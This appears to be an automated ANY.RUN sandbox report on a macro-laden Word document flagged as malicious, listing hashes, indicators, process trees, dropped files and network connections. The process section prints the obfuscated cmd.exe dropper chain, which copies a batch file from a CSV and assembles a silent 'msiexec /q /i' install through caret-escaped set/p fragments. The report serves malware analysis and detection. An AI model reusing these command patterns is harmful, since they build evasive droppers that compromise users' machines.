File name:

sample04.bin

Full analysis: https://app.any.run/tasks/2eb7f5fb-360e-4b76-a706-fdb0891ca338
Verdict: Malicious activity
Analysis date: October 31, 2024, 01:02:26
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
generated-doc
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 10 04:08:00 2020, Last Saved Time/Date: Mon Feb 10 04:08:00 2020, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 8
MD5:

CF41354C07D90A843A580118363CF13D

SHA1:

A5B7C18931BAAE4AD44F735C62457F569C87CE80

SHA256:

4473052278498E431F9D8AFCB1CA9B88059C5DB965424AD8FC70B8A8C5947BA2

SSDEEP:

3072:ITAFEmLe6fIDQE6fIDQfJ6fIDQAGjgC41PXSUue6N+jRQzFYpUUWAE:I8GXUPk+jQSpUOE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Gets path to any of the special folders (SCRIPT)

      • WINWORD.EXE (PID: 5896)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 5896)

    • Microsoft Office executes commands via PowerShell or Cmd

      • WINWORD.EXE (PID: 5896)

    • Unusual execution from MS Office

      • WINWORD.EXE (PID: 5896)

  • SUSPICIOUS

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • WINWORD.EXE (PID: 5896)

    • Executing commands from a ".bat" file

      • WINWORD.EXE (PID: 5896)
      • cmd.exe (PID: 1376)

    • Runs shell command (SCRIPT)

      • WINWORD.EXE (PID: 5896)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1376)

    • Application launched itself

      • cmd.exe (PID: 1376)

  • INFO

    • Reads mouse settings

      • WINWORD.EXE (PID: 5896)

    • An automatically generated document

      • WINWORD.EXE (PID: 5896)

    • The process uses the downloaded file

      • WINWORD.EXE (PID: 5896)

    • Reads the computer name

      • msiexec.exe (PID: 7536)

    • Sends debugging messages

      • WINWORD.EXE (PID: 5896)

    • Checks supported languages

      • msiexec.exe (PID: 7536)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2020:02:10 04:08:00
ModifyDate: 2020:02:10 04:08:00
Security: Locked for annotations
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: -
Characters: 1
Pages: 1
Paragraphs: 1
Lines: 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
146
Monitored processes
14
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe cmd.exe no specs conhost.exe no specs ping.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs msiexec.exe no specs msiexec.exe no specs ai.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1376CmD /k cd %temp%&p^in^g 2&copy summary.csv up^DATE1.bat&up^DATE1.bat&up^DATE.bat&gidurhfC:\Windows\System32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
4836C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
5896"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\AppData\Local\Temp\sample04.bin.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7176\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7212ping 2C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll
7380CmD /C echoC:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
7388C:\WINDOWS\system32\cmd.exe /S /D /c" set/p="msie" 1>C:\Users\admin\AppData\Local\Temp\update.bat"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
7420C:\WINDOWS\system32\cmd.exe /S /D /c" echo"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
7428C:\WINDOWS\system32\cmd.exe /S /D /c" set/P="^xec/q/i" 1>>C:\Users\admin\AppData\Local\Temp\update.bat"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
7460C:\WINDOWS\system32\cmd.exe /S /D /c" echo"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 773
Read events
14 352
Write events
382
Delete events
39

Modification events

(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E01000000000000000500000000000000
(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:delete valueName:0
Value:
ซ괐殺ࠆꯞꝅ莼跳⏺䘅헉꾍樁င$梅摝麨…ީ湕湫睯쥮௅賙ᒳ೅肫
(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:delete keyName:(default)
Value:
(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5896
Operation:writeName:0
Value:
0B0E103C05325DD833A64EBCFB050F489A064C230046F7ECAC9889E6CAED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511882ED2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(5896) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
Executable files
22
Suspicious files
123
Text files
30
Unknown types
1

Dropped files

PID
Process
Filename
Type
5896WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04binary
MD5:9C7628FF3146B086965815A78F1CF363
SHA256:3F4C7004494E9F1BC2916E6034C4CC470F52A9CF1D2C046BEA8E3DA840CACA54
5896WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:62F9E074C9E76829158CADACDE45E3A3
SHA256:B93F2EC284910DA778064B7449F1FB97B3311A214CAA63C4FB4264E578CBF64B
5896WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:B4377BADEDAC141B8D8C29FAE1C5A2CD
SHA256:3A3FCF4E6E99EEC01F7DA1793FB44038FE803AC167A0C12F90DD661F1071D8CE
5896WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:88EC3F8E8CC851EF586571DC90777871
SHA256:107208A1FA797237A807DDE3195B2A565373DAA84309275714A51781ADAA9C75
5896WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
5896WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:4782B983A79ECF9CBDF8C6E75592491A
SHA256:25F57D3C38EBFBE6E1A13267756116BEEB8DE6D65FF2346FB787D7C0663C202B
5896WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$mple04.bin.docbinary
MD5:55C259A3180947B28E65D62316E14D57
SHA256:52AC289BBFC5E387B2A7292393E42FFB32B3D74613FA9C4E8212F459380D839B
5896WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T5V24TZ1IELV5MEXARBS.tempbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
5896WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F2669C8B-4AC1-4562-AE7A-CA584BEF3EE8xml
MD5:19E7942B1A523E89F83CE3F21C392C1D
SHA256:945A4F14B87FBC50652C4939B23352D1931C7B20BFDC17E423F94BA68B777011
5896WINWORD.EXEC:\Users\admin\AppData\Local\Temp\summary.csvtext
MD5:253E7B674246E7F6264452C5185FF97E
SHA256:D02E952C45B0539D2DE73A8403E078DCA5B1AAD79EC39BCA464EA150C164F80B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
81
DNS requests
33
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5488
MoUsoCoreWorker.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5488
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5896
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
5784
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7776
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6480
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
7776
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5896
WINWORD.EXE
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
whitelisted
5896
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6944
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4360
SearchApp.exe
92.123.104.32:443
www.bing.com
Akamai International B.V.
DE
whitelisted
1584
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5488
MoUsoCoreWorker.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5488
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4020
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
  • 51.104.136.2
whitelisted
www.bing.com
  • 92.123.104.32
  • 92.123.104.38
  • 92.123.104.34
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
google.com
  • 142.250.185.174
whitelisted
officeclient.microsoft.com
  • 52.109.76.240
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
roaming.officeapps.live.com
  • 52.109.89.19
whitelisted
login.live.com
  • 40.126.31.73
  • 20.190.159.75
  • 20.190.159.0
  • 40.126.31.67
  • 20.190.159.2
  • 20.190.159.73
  • 20.190.159.68
  • 40.126.31.69
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
sample04.bin